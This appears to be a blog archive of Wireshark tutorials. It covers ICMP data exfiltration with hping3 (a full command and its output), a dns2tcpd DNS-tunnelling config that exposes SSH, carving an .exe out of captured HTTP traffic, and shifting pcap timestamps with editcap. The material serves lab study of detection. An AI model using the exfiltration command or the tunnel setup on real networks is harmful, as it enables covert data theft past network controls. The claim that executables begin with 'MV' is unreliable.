Categorie archief: Wireshark

Data exfiltration over ICMP

hping3 using kali linux

-E filename to send
-1 use ICMP
-u tell you when –file reached EOF and prevent rewind
-i send ICMP every 10 seconds (slow)
-d Destination IP

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95 192.168.20.106
HPING 192.168.20.106 (eth0 192.168.20.106): icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip=192.168.20.106 ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip=192.168.20.106 ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip=192.168.20.106 ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip=192.168.20.106 ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in file send “dns2tcp.txt”

root@kali:~# cat dns2tcp.txt
Kali

cat dns2tcpdrc

listen = 192.168.20.243
port = 53
user = nobody
chroot = /tmp/
domain = ns01.rootsecurity.info
resources = ssh:127.0.0.1:22
dns2tcpd -F -d 3 -f /dns2tcpdrc

 

Monitor on receiving end using Wireshark

icmp-1

icmp display filter

icmp-2

First session contains first part of the original file

icmp-3

Second session the rest of the file etc.

How to extract files from network traffic using Wireshark

  1. Install Wireshark and start to capture network traffic
  2. Download a .exe file which in this example is putty.exe
  3. When the file is downloaded to your machine stop the capture process
  4. Search and identify the session related to the download activity (hint look for GET activities)

wireshark-1

 

 

 

 

 

  1. Right click the session and select Follow Stream
  2. Instead of selecting the entire conversation, select only the traffic originating from the webserver in this case 46.43.34.31:80 -> 192.168.178.34:64491

wireshark-2

7. Click Save as and save is as for example dump

8. Now open the dump file using your favorite HEX editor & remove the HTTP header which in below screenshot is the red part:

 wireshark-3

  1. After you have remove the HTTP Header info you file should start with MV

 wireshark-4

  1. Save the file as dump.exe

wireshark-5

  1. See the result, you have now obtained the .exe from network traffic

 wireshark-6

How to change the timestamp of pcap files

Sometimes you need to change the timestamp of a previous recorded PCAP file. To do so follow the steps below:

1. Download and install wireshark

2. check the current timestamp of you pcap file – in my case this was the following:

pcap

3. Browse to the http://www.timeanddate.com/ site to calculate the time difference in seconds between the recorded & current time.

In this case this was the following:

time

4. Execute  the editcap.exe program of Wireshark to create a new PCAP file containing a current timestamp:

c:\Program Files (x86)\Wireshark>editcap.exe -t 83585803 -F pcap Lab5.pcap x:\TEST3.pcap

5. Open the new PCAP file in wireshark to confirm the change in date & time

Time-New